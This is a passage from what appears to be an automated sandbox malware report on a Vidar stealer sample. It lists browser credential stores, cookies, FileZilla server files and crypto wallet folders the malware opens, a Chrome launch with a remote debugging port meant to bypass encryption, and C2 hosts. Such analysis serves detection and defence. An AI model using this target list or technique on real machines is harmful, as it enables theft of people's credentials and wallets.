                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Centered.comBinary or memory string: WIN_81
                Source: Centered.comBinary or memory string: WIN_XP
                Source: Durable.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Centered.comBinary or memory string: WIN_XPe
                Source: Centered.comBinary or memory string: WIN_VISTA
                Source: Centered.comBinary or memory string: WIN_7
                Source: Centered.comBinary or memory string: WIN_8
                Source: Yara matchFile source: 00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Centered.com PID: 7244, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Attempt to bypass Chrome Application-Bound Encryption
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 16.2.Centered.com.49c0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2503014570.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.1613569602.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.1613510624.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2504659598.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Centered.com PID: 7244, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F82263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,16_2_00F82263
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F81C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,16_2_00F81C61

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API                		2
                Valid Accounts                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol4
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Extra Window Memory Injection                		2
                Obfuscated Files or Information                		Security Account Manager3
                File and Directory Discovery                		SMB/Windows Admin Shares21
                Input Capture                		1
                Remote Access Software                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		1
                DLL Side-Loading                		NTDS26
                System Information Discovery                		Distributed Component Object Model3
                Clipboard Data                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                Extra Window Memory Injection                		LSA Secrets11
                Query Registry                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                Process Injection                		121
                Masquerading                		Cached Domain Credentials221
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts                		DCSync1
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Virtualization/Sandbox Evasion                		Proc Filesystem4
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                Process Injection                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581179 Sample: din.exe Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 51 t.me 2->51 53 jCkYzqqYDalcEKzOzlTGtPWyRfbt.jCkYzqqYDalcEKzOzlTGtPWyRfbt 2->53 55 bijutr.shop 2->55 75 Suricata IDS alerts for network traffic 2->75 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 6 other signatures 2->81 10 din.exe 31 2->10         started        12 msedge.exe 2->12         started        signatures3 process4 process5 14 cmd.exe 3 10->14         started        18 msedge.exe 12->18         started        21 msedge.exe 12->21         started        23 msedge.exe 12->23         started        dnsIp6 49 C:\Users\user\AppData\Local\...\Centered.com, PE32 14->49 dropped 93 Drops PE files with a suspicious file extension 14->93 25 Centered.com 42 14->25         started        30 cmd.exe 2 14->30         started        32 conhost.exe 14->32         started        34 7 other processes 14->34 57 20.110.205.119, 443, 49876, 49912 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->57 59 204.79.197.219, 443, 49916, 49917 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->59 61 17 other IPs or domains 18->61 file7 signatures8 process9 dnsIp10 67 t.me 149.154.167.99, 443, 49760 TELEGRAMRU United Kingdom 25->67 69 bijutr.shop 188.245.216.205, 443, 49766, 49771 PARSONLINETehran-IRANIR Iran (ISLAMIC Republic Of) 25->69 71 127.0.0.1 unknown unknown 25->71 47 C:\ProgramData47GVAAIE3W4EU\5F3EKF, PE32+ 25->47 dropped 85 Attempt to bypass Chrome Application-Bound Encryption 25->85 87 Found many strings related to Crypto-Wallets (likely being stolen) 25->87 89 Found API chain indicative of sandbox detection 25->89 91 4 other signatures 25->91 36 msedge.exe 2 11 25->36         started        39 chrome.exe 25->39         started        file11 signatures12 process13 dnsIp14 83 Monitors registry run keys for changes 36->83 42 msedge.exe 36->42         started        63 192.168.2.7, 123, 138, 443 unknown unknown 39->63 65 239.255.255.250 unknown Reserved 39->65 44 chrome.exe 39->44         started        signatures15 process16 dnsIp17 73 www.google.com 172.217.21.36, 443, 49787, 49789 GOOGLEUS United States 44->73

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                din.exe22%VirustotalBrowse
                din.exe55%ReversingLabsWin32.Trojan.Leonem

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\ProgramData\NGVAAIE3W4EU\5F3EKF0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\322891\Centered.com0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://bijutr.shopIE3W4EU0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                bijutr.shop
                		188.245.216.205
                		truefalse
                  		high
                  chrome.cloudflare-dns.com
                  		172.64.41.3
                  		truefalse
                    		high
                    t.me
                    		149.154.167.99
                    		truefalse
                      		high
                      ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                      		94.245.104.56
                      		truefalse
                        		high
                        sb.scorecardresearch.com
                        		18.165.220.66
                        		truefalse
                          		high
                          www.google.com
                          		172.217.21.36
                          		truefalse
                            		high
                            s-part-0035.t-0009.t-msedge.net
                            		13.107.246.63
                            		truefalse
                              		high
                              googlehosted.l.googleusercontent.com
                              		142.250.181.65
                              		truefalse
                                		high
                                jCkYzqqYDalcEKzOzlTGtPWyRfbt.jCkYzqqYDalcEKzOzlTGtPWyRfbt
                                		unknown
                                		unknownfalse
                                  		unknown
                                  clients2.googleusercontent.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    bzib.nelreports.net
                                    		unknown
                                    		unknownfalse
                                      		high
                                      assets.msn.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        ntp.msn.com
                                        		unknown
                                        		unknownfalse
                                          		high

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735286745671&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                            		high
                                            https://assets.msn.com/statics/icons/favicon_newtabpage.pngfalse
                                              		high
                                              https://sb.scorecardresearch.com/b?rn=1735286739103&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=309DCA2A26BF68F127E0DF4827176945&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                		high
                                                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735286744806&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                  		high

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabCentered.com, 00000010.00000002.2511212065.0000000006B2B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890526329.000036EC00C64000.00000004.00000800.00020000.00000000.sdmp, Web Data.28.dr, XTRIWB.16.dr, 3OHLNY.16.drfalse
                                                    		high
                                                    https://mail.google.com/mail/?usp=installed_webappchrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/ac/?q=Centered.com, 00000010.00000002.2511212065.0000000006B2B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmp, Web Data.28.dr, XTRIWB.16.dr, 3OHLNY.16.drfalse
                                                        		high
                                                        https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 00000015.00000002.1885904115.000036EC0008C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 00000015.00000002.1888594099.000036EC00748000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://docs.google.com/document/Jchrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://google-ohttp-relay-join.fastly-edge.com/jgchrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 00000015.00000002.1888775978.000036EC007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887531372.000036EC004B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ntp.msn.com/_defaultQuotaManager.28.drfalse
                                                                      		high
                                                                      http://anglebug.com/4633chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://anglebug.com/7382chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://google-ohttp-relay-join.fastly-edge.com/Zjchrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://issuetracker.google.com/284462263msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://deff.nelreports.net/api/report?cat=msn2cc80dabc69f58b6_0.28.drfalse
                                                                                		high
                                                                                https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEklychrome.exe, 00000015.00000002.1888831081.000036EC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890637847.000036EC00CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888720428.000036EC007B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://deff.nelreports.net/api/reportReporting and NEL.29.drfalse
                                                                                    		high
                                                                                    https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://polymer.github.io/AUTHORS.txtchrome.exe, 00000015.00000003.1810575976.000036EC010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1891087879.000036EC00D98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813167152.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886957092.000036EC002F7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812347913.000036EC00A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813304700.000036EC01224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810894201.000036EC010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810519278.000036EC0109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810791157.000036EC010FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812330053.000036EC00CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810832476.000036EC00F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812535851.000036EC00F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812369339.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://docs.google.com/document/:chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://bijutr.shopIE3W4EUCentered.com, 00000010.00000002.2505513959.0000000004A9D000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://google-ohttp-relay-join.fastly-edge.com/iichrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://deff.nelreports.net/api/report?cat=msnwReporting and NEL.29.drfalse
                                                                                                		high
                                                                                                https://google-ohttp-relay-join.fastly-edge.com/gj8Ychrome.exe, 00000015.00000003.1801561805.0000593800684000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 00000015.00000003.1810253687.000036EC00F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1889585937.000036EC009D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
